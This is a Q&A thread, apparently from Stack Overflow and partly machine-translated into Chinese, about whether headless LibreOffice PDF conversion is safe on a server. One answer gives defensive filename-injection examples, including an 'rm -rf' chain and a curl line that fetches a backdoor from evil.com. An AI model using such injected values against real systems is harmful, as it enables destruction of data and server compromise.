LibreOffice(无头)在网络服务器上使用安全吗?

时间:2019-03-08 20:47:39

标签: reporting libreoffice

我将my-template.docx转换为OpenXml的my-report.docx,然后将my-report.pdf转换为:

soffice --headless --convert-to pdf my-report.docx

我不得不说这个功能非常受赞赏。无论如何,我找不到here(cli文档)或here(与MS Office相比)或我的other post的答案是LibreOffice对于自动化是安全的。

请参阅Microsoft的this帖子,其中说不要将Word用于服务器端自动化。这就引出了LibreOffice对于服务器端自动化是否安全的问题?基本上,只要有报告要求,我都会使用C#运行soffice --headless --convert-to pdf my-report.docx

那样安全吗?

*假设没有其他人正在尝试阅读my-report.docx

3 个答案:

答案 0 :(得分:4)

只要您控制输入文件的内容,就不会有任何问题。请记住,LibreOffice每个用户配置文件仅允许一个活动实例,因此,如果您希望能够并行处理多个文档,则应使用单独的用户配置文件。

如果您拥有不受信任的输入数据,则整个问题将变得更加复杂。尽管已经有很多工作在保护代码库,但桌面办公套件仍然是一款庞大的软件,具有许多潜在的攻击面(宏,远程数据连接,旧的二进制文件格式等)。尽管所有这些功能都应在无头操作中被阻止,但您必须相信没有未发现的错误。

Microsoft文章中的其余内容不适用于LibreOffice。无头模式旨在不与桌面环境交互,并且用户配置文件不会更改系统中的任何内容或依赖于任何与桌面相关的部分。默认的构建仍将依赖于某些GUI库,但是如果确实成为问题,则可以使用实验性的构建选项来构建没有任何X / GTK / KDE库依赖项的非GUI版本。

作为替代方案,在LibreOffice之上还构建了一些项目,这些项目试图使转换文档更加容易,并且实际上通过预分支或使用LibreOfficeKit API可能会更快。两个示例是JODConverterunoconv

答案 1 :(得分:2)

Moggi的答案很好。我唯一可以添加的是:

  1. 您可以考虑通过在某种沙箱(例如Docker)中运行libreoffice(办公室)实例来提高安全性。这意味着如果发生流氓行为,沙盒可以限制潜在的损害,
  2. 如果您的站点正忙于生成PDF,则每次启动该过程都可能是一项开销。如果发生这种情况,使用上一层(例如JODConverter)可以多次启动一次。

我希望有帮助。

答案 2 :(得分:1)

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

TL;DR in your case, it is.

What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):

  • the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
  • the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
  • LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.

Possible but unlikely "exploit" avenues that might remain:

  • the destination file. I expect that even if you asked the user for the name of the resulting file, still you would do something like create a unique pdf filename, and send the user name as Content-Disposition: attachment; filename="thatswhatshesaid";, not using the user's filename on your filesystem and risking saving data to byebye.pdf && rm -rf ... (or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php or...), sending back a Location: downloads/whatshesaid.pdf.
  • very large values in the XML output that might trigger anomalous behaviour. Chances of this happening, and of doing so in any meaningful (for the attacker) way, are negligible, but still, nothing's wrong with checking.